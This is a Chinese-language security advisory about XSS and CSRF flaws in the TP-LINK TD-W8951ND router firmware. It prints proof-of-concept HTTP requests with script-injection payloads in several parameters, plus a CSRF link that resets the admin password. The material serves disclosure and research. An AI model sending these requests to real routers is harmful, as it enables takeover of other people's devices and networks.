TP-LINK TD-W8951ND Router 跨站脚本和请求伪造漏洞
发布日期:2013-09-05
更新日期:2013-09-07
受影响系统:
TP-LINK TD-W8951ND 4.0.0 Build 120607 Rel.30923
描述:
--------------------------------------------------------------------------------
TD-W8951ND是款无线路由器产品。
TD-W8951ND 4.0.0 Build 120607 Rel.30923存在多个漏洞,远程攻击者可利用这些漏洞执行跨站脚本和请求伪造攻击。这些漏洞源于/Forms/home_wlan_1内的"wlanWEBFlag", "AccessFlag", "wlan_APenable"参数值,及/Forms/tools_test_1内的"PingIPAddr" POST参数值,导致在用户浏览器中执行任意HTML和脚本代码;以及源于没有正确验证某些HTTP请求。
<*来源:xistence ([email protected])
链接:http://secunia.com/advisories/54692/
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
[ 0x01 - Unauthenticated Reflected XSS in Referer for non-existing url
pages ]
GET /doesnotexist HTTP/1.1
Host: <IP>
Referer: http://pwned"><script>alert("XSS")</script>
Connection: keep-alive
[ 0x02 - Authenticated Reflected XSS in "home_wlan_1" arguments ]
http://
<IP>/Forms/home_wlan_1?wlanWEBFlag=%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E
http://
<IP>/Forms/home_wlan_1?AccessFlag=%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E
http://
<IP>/Forms/home_wlan_1?wlan_APenable=%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E
[ 0x03 - Authenticated XSS in diagnostics (ping) "/Forms/tools_test_1"
argument "PingIPAddr" ]
POST /Forms/tools_test_1 HTTP/1.1
Host: <IP>
Referer: http://<IP>/maintenance/tools_test.htm
Authorization: Basic blablabla==
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 164
Test_PVC=PVC0&PingIPAddr=%3C%2Ftextarea%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&pingflag=1&trace_open_flag=0&InfoDisplay=Ping+request+could+not+find+host+
[ 0x04 - Reset Admin password CSRF ]
http://
<IP>/Forms/tools_admin_1?uiViewTools_Password=PWNED&uiViewTools_PasswordConfirm=PWNED
建议:
--------------------------------------------------------------------------------
厂商补丁:
TP-LINK
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: